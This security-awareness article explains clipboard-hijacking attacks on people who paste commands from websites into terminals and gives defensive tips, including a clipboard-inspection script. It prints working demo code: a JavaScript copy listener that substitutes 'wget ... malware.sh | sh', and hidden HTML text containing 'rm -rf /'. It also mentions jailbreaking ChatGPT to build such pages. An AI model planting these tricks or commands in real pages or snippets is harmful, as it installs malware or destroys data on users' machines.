
Why You Shouldn’t Copy-Paste Commands From the Internet

From computers to mobile phones, copy-pasting is prevalent everywhere. It makes life easier and saves you time, as you don’t have to type long commands or repetitive text. However, if you aren’t careful enough, you can get hacked by simply copy-pasting commands into your computer’s terminal.


Let’s learn how copying and pasting can get you hacked, and what you should do to prevent it.


Why You Shouldn’t Copy-Paste Commands

Whether you’re new to using the command line or you’re a seasoned veteran, you may be tempted to copy-paste commands from the internet to save time and get actual work done. However, you should be aware that malicious sites are actually weaponizing code boxes to inject malicious code whenever you copy-paste commands directly into the terminal.

These malicious actors are using various frontend tricks to conceal malicious commands behind harmless-looking code.

A command like sudo apt-get update && apt-get upgrade should normally update the repositories and upgrade the packages on a Linux system. However, if you’re unaware and copy-paste this command directly into your terminal, you might be unknowingly executing malicious code with root privileges due to the sudo prefix.

In the worst-case scenario, this could possibly result in a complete takeover of your system or even a ransomware attack. But, how do the threat actors do this? How can malicious commands be hidden behind harmless code?

How Malicious Code Exploits Work

[Image: PoC of exploit]

This exploit can be carried out using cleverly crafted JavaScript or even basic HTML. JavaScript has a mechanism called EventListener. Events are actions that can happen in the browser, such as clicking a button, submitting a form, mouse movement, pressing keystrokes, or resizing the window.

The EventListener, as the name suggests, enables your web application to react to certain events triggered by user action. Malicious webpages exploit this legitimate and useful mechanism by capturing the event where a user is copying text and replacing the harmless text with malicious code.

Here’s the main exploit code used to build the demo image:

 <script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

Here’s another demo that doesn’t require any JavaScript and uses vanilla HTML:

 <p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

This creates invisible white text, effectively hiding the malicious command “rm -rf /”, and the <br> tag creates a line break so that some terminals will immediately execute the code upon pasting it. You might think that a strong grasp of programming and web development is required to carry out this attack but, in reality, it’s actually quite easy.

Even if an attacker doesn’t have any knowledge of JavaScript or web development, they can easily create malware using ChatGPT. With the right prompts, one can easily jailbreak ChatGPT and make it create malicious web pages that make use of this trick.

How You Can Protect Yourself


There’s no concrete way to protect yourself against malicious code attacks. Sure, you can disallow JavaScript for suspicious sites but, by their nature, they probably wouldn’t allow you to browse without JavaScript turned on.

Moreover, for the CSS (Cascading Style Sheets) method, there’s no concrete defense against malicious commands since it’s still valid CSS code (i.e. there’s nothing wrong with it but the intent is still malicious). The best way to protect yourself would be just to follow basic internet hygiene and have your wits about you.

Don’t visit unknown links and make sure to always paste the command you’re copying from the internet into a text editor before pasting it into the terminal. Stick to legitimate and reputable code resources to make sure you’re not welcoming malicious code into your command line.

Additionally, a few terminals, like xfce4-terminal, come pre-equipped with copy-paste protection. They display a pop-up that tells you exactly what will be executed as soon as you paste a command into your terminal. Check whether your terminal has a similar mechanism and activate it.
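The "paste it into a text editor first" check can also be scripted. The following is an added example, not code from the original article: a small Python filter that prints clipboard text with hidden characters escaped and flags the traits produced by the two demos on this page. The function names, the finding labels, and the two sample strings (constructed from the page's demos) are assumptions.

```python
import re
import sys
import unicodedata

# Constructed samples: what each demo on this page would leave on the clipboard.
JS_DEMO_CLIPBOARD = "wget http://localhost:8000/malware.sh | sh"
HTML_DEMO_CLIPBOARD = "sudo apt-get install google-chrome-stable\nrm -rf /\n"

# A download or other output piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(sh|bash|zsh|dash)\b")


def is_hidden(ch):
    """Control (Cc) and format (Cf) characters render as nothing in most views."""
    return unicodedata.category(ch) in ("Cc", "Cf")


def visible(text):
    """Render text so nothing can hide: newlines and invisible characters are escaped."""
    out = []
    for ch in text:
        if ch == "\n":
            out.append("\\n\n")
        elif is_hidden(ch):
            out.append("\\x%02x" % ord(ch) if ord(ch) < 256 else "\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def inspect_paste(text):
    """Return a list of findings for text about to be pasted into a terminal."""
    findings = []
    if len([line for line in text.splitlines() if line.strip()]) > 1:
        findings.append("multiple-commands")   # more than the one line you saw
    if text.endswith(("\n", "\r")):
        findings.append("trailing-newline")    # may execute as soon as it is pasted
    if any(is_hidden(c) and c not in "\n\r\t" for c in text):
        findings.append("hidden-characters")
    if PIPE_TO_SHELL.search(text):
        findings.append("pipe-to-shell")
    if re.search(r"\bsudo\b", text):
        findings.append("runs-as-root")
    return findings


if __name__ == "__main__":
    pasted = sys.stdin.read()
    print(visible(pasted))
    for finding in inspect_paste(pasted):
        print("WARNING:", finding)
```

Pipe the clipboard contents to the script on standard input and read its output before pasting anything into a shell.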

Malicious Code Execution Is Highly Dangerous

Even if you’ve got antivirus installed, certain forms of malicious code execution can still penetrate your device’s protective barriers. This is why it’s crucial to be wary of the code you copy online and employ protective measures wherever possible to keep yourself safe.
